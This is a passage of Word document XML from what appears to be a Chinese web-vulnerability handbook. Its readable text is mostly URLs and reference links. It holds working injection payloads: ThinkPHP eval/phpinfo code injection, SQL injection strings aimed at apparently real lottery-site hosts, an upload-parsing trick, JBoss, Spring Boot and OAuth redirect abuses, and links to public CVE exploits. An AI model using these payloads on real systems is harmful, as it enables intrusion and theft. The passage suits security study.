          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://localhost/thinkphp/thinkphp_2.1/Examples/Blog/index.php/module/action/cccc/${@print(THINK_VERSION)}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7620" b="0"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://localhost/thinkphp/thinkphp_2.1/Examples/Blog/index.php/module/action/cccc/${@phpinfo()}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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://localhost/thinkphp/thinkphp_2.1/Examples/Blog/index.php/module/action/param1/{${eval($_POST[s])}}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漏洞地址</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://localhost/thinkphp/thinkphp_3.1.3/app/index.php/index/index/name/${@phpinfo()}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0" b="254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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://lebi.17500.cn/Experts/Search/index/lotid/3d.html?ename[0]=exp&amp;ename[1]=and(select(0)from(select/**/sleep(1))v)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://devlebi.17500.cn/Experts/Search/index/lotid/3d.html?</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ename[0]=exp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ename[1]=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>and%20updatexml(1,concat(0x7c,user(),0x7c,version()),1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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0"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M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="63"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/opsxcq/exploit-CVE-2016-10033/blob/master/exploit.sh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://192.168.152.128:8002</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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30"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:u w:val="none"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>://</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6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3175" b="762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0"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6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62"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4769485" cy="1852295"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>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62"/>
        <w:spacing w:after="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5755640" cy="1741170"/>
            <wp:effectExtent l="0" t="0" r="0" b="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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://192.168.152.128:8000/uploadfiles/6ef39410284b29df1987752c0feec635.jpg</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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://192.168.152.128:8000/uploadfiles/6ef39410284b29df1987752c0feec635.jpg/1.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5753735" cy="1732915"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://192.168.152.128:8080/index.php?-s</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0" b="63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0" b="0"/>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6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0" b="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6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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/composer/composer/commit/bf125295df9da84c44989e33f9f84b4ed4f8ea56</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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635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254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2540" b="508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35"/>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0" b="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0" b="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30"/>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
        <w:t>https://github.com/Joan016/poc/blob/master/Weblogic/CVE-2017-10271/curl-payload.xml</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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0" b="254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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/iBearcat/Oracle-WebLogic-CVE-2017-10271</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30"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>补丁</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26"/>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/WebLogic/Oracle/Middleware/wlserver_10.3/server/lib/wls-wsat.war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/WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/.internal/wls-wsat.war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-rf /WebLogic/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/wls-wsat</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="23"/>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23"/>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23"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://pan.baidu.com/s/1Il6Z4WnQ6jgHWaq_p3WTCw</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30"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://blog.csdn.net/u013054618/article/details/71107100</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:firstLine="1200" w:firstLineChars="500"/>
        <w:rPr>
          <w:rStyle w:val="30"/>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30"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/pwntester/SerialKillerBypassGadgetCollection/blob/master/src/main/java/serialkiller/bypass/Weblogic1.java</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:hint="eastAsia"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pStyle w:val="62"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5755640" cy="2877820"/>
            <wp:effectExtent l="0" t="0" r="0"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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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61"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="59" w:name="_Toc27676938"/>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="61"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>5.2 J</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="61"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://192.168.230.134:8080/invoker/readonly</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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0" b="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30"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/yunxu1/jboss-_CVE-2017-12149</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/1337g/CVE-2017-12149/blob/master/CVE-2017-12149.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://access.redhat.com/security/cve/cve-2017-12149</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0" b="381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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://124.250.31.122:10010/static/bugs/wooyun-2015-0159819.html</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6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5715" b="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762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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://blogs.securiteam.com/index.php/archives/3171</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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://www.cnblogs.com/backlion/p/6813260.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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0"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/rapid7/metasploit-framework/pull/7815</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/rapid7/metasploit-framework/pull/7815</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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/Joan016/poc/blob/master/Jenkins/CVE-2016-0792/XML.txt</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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:kern w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/Joan016/poc/blob/master/Jenkins/CVE-2016-0792/a.png</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0" b="317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62"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rStyle w:val="30"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>http://www.freebuf.com/vuls/97659.html</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drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5755640" cy="1536065"/>
            <wp:effectExtent l="0" t="0" r="0" b="698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0" b="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30"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>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1"/>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6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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://pan.baidu.com/s/1gRTN8vFwuHHqZrQ_u1MuvA</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0" b="508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30"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>厂商的主页下载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61"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>设置</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="61"/>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6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9525" b="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0" b="508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6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68"/>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6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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://www.example.com/actuator/jolokia</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>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6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24"/>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rStyle w:val="61"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参考资料：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="6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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://www.veracode.com/blog/research/exploiting-spring-boot-actuators</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="62"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rStyle w:val="30"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://github.com/mpgn/Spring-Boot-Actuator-Exploit" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>https://github.com/mpgn/Spring-Boot-Actuator-Exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>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0" b="762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0" b="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6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b w:val="0"/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>参考资料：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="61"/>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09"/>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0"/>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如http</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>://www.example.com/login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1"/>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2"/>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3"/>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4"/>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0" b="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0"/>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6"/>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7"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5782410" cy="4305687"/>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0" b="508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0"/>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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5824424" cy="25044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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5755640" cy="145923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7"/>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a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5755640" cy="3691890"/>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0" b="825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29"/>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0"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0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5755640" cy="19850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127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0" b="825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0" b="0"/>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98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0" b="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0" b="698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7"/>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0"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127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39"/>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0"/>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52"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:color w:val="auto"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5755640" cy="678815"/>
            <wp:effectExtent l="0" t="0" r="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1"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5755640" cy="67881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r>
        <w:rPr>
          <w:rStyle w:val="53"/>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52"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5755640" cy="2679065"/>
            <wp:effectExtent l="0" t="0" r="0" b="698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2"/>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3"/>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4"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5755640" cy="19030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0" b="698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0" b="0"/>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0" b="0"/>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7"/>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0" b="762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48"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5792426" cy="21206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5080" b="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2"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5755640" cy="175387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0" b="127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万能密码如0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>00000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>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0" b="0"/>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53"/>
          <w:rFonts w:hint="eastAsia" w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:b w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>当目标用户被欺骗访问伪造的授权链接进行登陆后，可通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>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30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>https://openapi.baidu.com/oauth/2.0/authorize?response_type=code&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>client_id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>=foRRWjPq8In3SIhmKQw1Pep3&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="宋体"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>redirect_uri</w:t>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color w:val="FF0000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>code</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="30"/>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑" w:cs="宋体"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>=f056147c661d0b9fbb6cd305567cb994</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7"/>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8"/>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9"/>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0"/>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1"/>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=http%3A%2F%2Fapp.56.com%40wooyun.org</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2"/>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3"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5775738" cy="297619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4"/>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5"/>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ttp://www.example.com/session_id=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="53"/>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52"/>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5755005" cy="382397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6"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5772260" cy="383594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52"/>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52"/>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pict>
